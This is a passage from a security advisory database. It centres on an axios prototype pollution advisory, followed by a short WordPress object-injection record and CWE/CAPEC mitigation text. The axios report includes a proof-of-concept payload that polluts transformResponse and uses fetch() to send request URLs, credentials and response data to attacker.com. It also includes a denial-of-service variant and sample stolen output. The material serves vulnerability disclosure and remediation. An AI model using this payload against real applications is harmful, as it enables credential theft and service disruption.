plus original response body\n} finally {\n delete Object.prototype.transformResponse;\n\n server.close();\n}\n```\n\nExpected result on fully affected versions: the polluted transform runs, captures request config and response data, and replaces the response returned to the caller.\n\nExpected result on fixed versions: the polluted transform is ignored, and the original response is returned.\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal source report\u003c/summary\u003e\n\n## Summary\n\nThe Axios library is vulnerable to a Prototype Pollution \"Gadget\" attack that allows any `Object.prototype` pollution in the application\u0027s dependency tree to be escalated into **credential theft** and **response hijacking** across all Axios requests.\n\nThe `mergeConfig()` function reads config properties via standard property access (`config2[prop]`), which traverses the JavaScript prototype chain. When `Object.prototype.transformResponse` is polluted with a function, it **overrides the default JSON response parser** for every request. The injected function executes with `this = config`, exposing `auth.username`, `auth.password`, request URL, and all headers.\n\n**Severity:** High (CVSS 8.2)\n**Affected Versions:** All versions (v0.x - v1.x including v1.15.0)\n**Vulnerable Component:** `lib/core/mergeConfig.js` (Config Merge) + `lib/core/transformData.js` (Transform Execution)\n\n## CWE\n\n- **CWE-1321:** Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)\n\n## CVSS 3.1\n\n**Score: 9.4 (High)**\n\nVector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H`\n\n| Metric | Value | Justification |\n|---|---|---|\n| Attack Vector | Network | PP is triggered remotely via any vulnerable dependency |\n| Attack Complexity | Low | Once PP exists, a single property assignment exploits axios. Consistent with GHSA-fvcv-3m26-pcqx scoring |\n| Privileges Required | None | No authentication needed |\n| User Interaction | None | No user interaction required |\n| Scope | Unchanged | Credential theft occurs within the same application process |\n| Confidentiality | High | `this.auth.password`, `this.url`, original response data all exfiltrated |\n| Integrity | Low | Response data is replaced with `true` \u2014 attacker **cannot** return arbitrary data due to `assertOptions` constraint (see below) |\n| Availability | High | Polluting with an array value causes `TypeError: validator is not a function` crash (DoS) on every request |\n\n### Relationship to GHSA-fvcv-3m26-pcqx\n\nThis vulnerability is in the same class as GHSA-fvcv-3m26-pcqx (\"Unrestricted Cloud Metadata Exfiltration via Header Injection Chain\"), which was also a PP gadget in axios rated Critical. Both require zero direct user input and exploit `mergeConfig`\u0027s prototype chain traversal.\n\n| Factor | GHSA-fvcv-3m26-pcqx | This Vulnerability |\n|---|---|---|\n| Attack vector | PP \u2192 Header injection \u2192 Request smuggling | PP \u2192 Transform function override \u2192 Credential theft |\n| Fixed by 1.15.0 header sanitization? | Yes | **No \u2014 different code path** |\n| Affects | Requests using form-data package | **All requests** (transformResponse is in defaults) |\n| Impact | AWS IMDSv2 bypass, cloud compromise | Credential theft (auth, API keys), response hijacking, DoS |\n\n## Usage of \"Helper\" Vulnerabilities\n\nThis vulnerability requires **Zero Direct User Input**.\n\nIf an attacker can pollute `Object.prototype` via any other library in the stack (e.g., `qs`, `minimist`, `lodash`, `body-parser`), Axios will automatically pick up the polluted `transformResponse` property during its config merge.\n\nThe critical difference from GHSA-fvcv-3m26-pcqx: this vector was **NOT fixed** by the header sanitization patch in v1.15.0, because it does not use headers at all \u2014 it injects a function into the response processing pipeline.\n\n## Proof of Concept\n\n### 1. The Setup (Simulated Pollution)\n\nImagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets:\n\n```javascript\nObject.prototype.transformResponse = function(data, headers, status) {\n // Steal credentials via this context (this = full request config)\n if (this \u0026\u0026 this.url \u0026\u0026 typeof data === \u0027string\u0027) {\n fetch(\u0027https://attacker.com/exfil\u0027, {\n method: \u0027POST\u0027,\n body: JSON.stringify({\n url: this.url,\n username: this.auth?.username,\n password: this.auth?.password,\n responseData: data,\n })\n });\n }\n return true; // MUST return true to pass assertOptions validator check\n};\n```\n\n**Important constraint:** The polluted value must be a **function returning `true`**, not an array. If an array is used, `assertOptions()` at `validator.js:89-92` crashes with `TypeError: validator is not a function` (which is still a DoS vector). The function must return `true` because `validator.js:93` checks `result !== true`.\n\n### 2. The Gadget Trigger (Safe Code)\n\nThe application makes a completely safe, hardcoded request:\n\n```javascript\n// This looks safe to the developer\nconst response = await axios.get(\u0027https://api.internal/users\u0027, {\n auth: { username: \u0027svc-account\u0027, password: \u0027prod-secret-key-123!\u0027 }\n});\n```\n\n### 3. The Execution\n\nAxios\u0027s `mergeConfig()` at `mergeConfig.js:99-103` iterates config keys:\n\n```javascript\nutils.forEach(Object.keys({...config1, ...config2}), function computeConfigValue(prop) {\n // \u0027transformResponse\u0027 is in config1 (defaults) \u2192 included in keys\n const merge = mergeMap[prop]; // \u2192 defaultToConfig2\n const configValue = merge(config1[prop], config2[prop], prop);\n // config2[\u0027transformResponse\u0027] traverses prototype \u2192 finds polluted function!\n});\n```\n\nThe polluted function then executes at `transformData.js:21`:\n\n```javascript\ndata = fn.call(config, data, headers.normalize(), response ? response.status : undefined);\n// fn = attacker\u0027s function, this = config (containing auth credentials)\n```\n\n### 4. The Impact\n\n```\nAttacker receives at https://attacker.com/exfil:\n\n{\n \"url\": \"https://api.internal/users\",\n \"username\": \"svc-account\",\n \"password\": \"prod-secret-key-123!\",\n \"responseData\": \"{\\\"users\\\":[{\\\"id\\\":1,\\\"role\\\":\\\"admin\\\"}]}\"\n}\n```\n\nThe response data seen by the application is `true` (the required return value), which will likely cause the application to malfunction but will not reveal the theft.\n\n### 5. DoS Variant\n\n```javascript\n// Array pollution crashes every request\nObject.prototype.transformResponse = [function(d) { return d; }];\n\nawait axios.get(\u0027https://any-url.com\u0027);\n// \u2192 TypeError: validator is not a function\n// Every request in the application crashes\n```\n\n## Verified PoC Output\n\n```\nStep 1 - Normal behavior (before pollution): \n Default transformResponse function name: \"transformResponse\"\n\nStep 2 - Polluting Object.prototype.transformResponse: \n Function replaced by attacker: true\n\nStep 3 - Simulating dispatchRequest transformResponse: \n Original server response: {\"secret_key\":\"sk-prod-a1b2c3d4\",\"internal_ip\":\"10.0.0.5\"} \n After malicious transform: true \n Response tampered: true\n\nStep 4 - Exfiltrated data: \n Original response data: {\"secret_key\":\"sk-prod-a1b2c3d4\",\"internal_ip\":\"10.0.0.5\"} \n Request URL: https://internal-api.corp/secrets \n Authentication info: {\"username\":\"admin\",\"password\":\"P@ssw0rd123!\"}\n```\n\n## Impact Analysis\n\n- **Credential Theft:** `this.auth.username`, `this.auth.password`, `this.headers.Authorization`, and all other config properties are accessible to the injected function. The attacker can exfiltrate them to an external server.\n- **Response Data Exfiltration:** The original server response (`data` parameter) is available to the injected function before being replaced.\n- **Universal Scope:** Affects **every** axios request in the application, including all third-party libraries that use axios.\n- **Denial of Service:** Polluting with a non-function value crashes every request.\n- **Bypass of 1.15.0 Fix:** The header sanitization patch in v1.15.0 (GHSA-fvcv-3m26-pcqx fix) does not address this vector.\n\n### Limitations (Honest Assessment)\n\n- Requires a separate prototype pollution vulnerability elsewhere in the dependency tree\n- Response data cannot be arbitrarily tampered \u2014 the function must return `true` to pass `assertOptions`\n- This is in-process JavaScript function execution, not OS-level RCE\n\n## Recommended Fix\n\nUse `hasOwnProperty` checks in `defaultToConfig2` to prevent prototype chain traversal:\n\n```javascript\n// In lib/core/mergeConfig.js\nfunction defaultToConfig2(a, b, prop) {\n if (Object.prototype.hasOwnProperty.call(config2, prop) \u0026\u0026 !utils.isUndefined(b)) {\n return getMergedValue(undefined, b);\n } else if (!utils.isUndefined(a)) {\n return getMergedValue(undefined, a);\n }\n}\n```\n\nAdditionally, validate that `transformResponse` contains only functions before execution:\n\n```javascript\n// In lib/core/transformData.js\nutils.forEach(fns, function transform(fn) {\n if (typeof fn !== \u0027function\u0027) {\n throw new AxiosError(\u0027Transform must be a function\u0027, AxiosError.ERR_BAD_OPTION);\n }\n data = fn.call(config, data, headers.normalize(), response ? response.status : undefined);\n});\n```\n\n## Resources\n\n- [CWE-1321: Prototype Pollution](https://cwe.mitre.org/data/definitions/1321.html)\n- [GHSA-fvcv-3m26-pcqx: Related PP Gadget in Axios (Fixed in 1.15.0)](https://github.com/advisories/GHSA-fvcv-3m26-pcqx)\n- [Axios GitHub Repository](https://github.com/axios/axios)\n- [Snyk: Prototype Pollution](https://learn.snyk.io/lesson/prototype-pollution/)\n\n## Timeline\n\n| Date | Event |\n|---|---|\n| 2026-04-15 | Vulnerability discovered during source code audit |\n| 2026-04-15 | Initial PoC developed (array payload \u2014 crashes at validator.js) |\n| 2026-04-16 | PoC corrected (function payload returning true \u2014 works) |\n| 2026-04-16 | Report revised with accurate constraints |\n| TBD | Report submitted to vendor via GitHub Security Advisory |\n\u003c/details\u003e",
"id": "GHSA-3g43-6gmg-66jw",
"modified": "2026-06-12T19:25:15Z",
"published": "2026-05-29T16:07:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/axios/axios/security/advisories/GHSA-3g43-6gmg-66jw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44495"
},
{
"type": "PACKAGE",
"url": "https://github.com/axios/axios"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "axios Vulnerable to Credential Theft and Response Hijacking via Prototype Pollution Gadget in Config Merge"
}
GHSA-3GQC-3HVH-6HCG
Vulnerability from github – Published: 2022-05-13 01:20 – Updated: 2022-05-13 01:20admin/partials/wp-splashing-admin-main.php in the Splashing Images plugin (wp-splashing-images) before 2.1.1 for WordPress allows authenticated (administrator, editor, or author) remote attackers to conduct PHP Object Injection attacks via crafted serialized data in the 'session' HTTP GET parameter to wp-admin/upload.php.
{
"affected": [],
"aliases": [
"CVE-2018-6195"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-915"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-01-30T20:29:00Z",
"severity": "HIGH"
},
"details": "admin/partials/wp-splashing-admin-main.php in the Splashing Images plugin (wp-splashing-images) before 2.1.1 for WordPress allows authenticated (administrator, editor, or author) remote attackers to conduct PHP Object Injection attacks via crafted serialized data in the \u0027session\u0027 HTTP GET parameter to wp-admin/upload.php.",
"id": "GHSA-3gqc-3hvh-6hcg",
"modified": "2022-05-13T01:20:30Z",
"published": "2022-05-13T01:20:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-6195"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/1807349/wp-splashing-images"
},
{
"type": "WEB",
"url": "https://wpvulndb.com/vulnerabilities/9015"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/146109/WordPress-Splashing-Images-2.1-Cross-Site-Scripting-PHP-Object-Injection.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2018/Jan/91"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.
Mitigation
By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.
Mitigation
Strategy: Input Validation
When handling untrusted objects, validating using a schema can be used.
Mitigation
By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.
Mitigation
Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.
CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.
CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels
An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.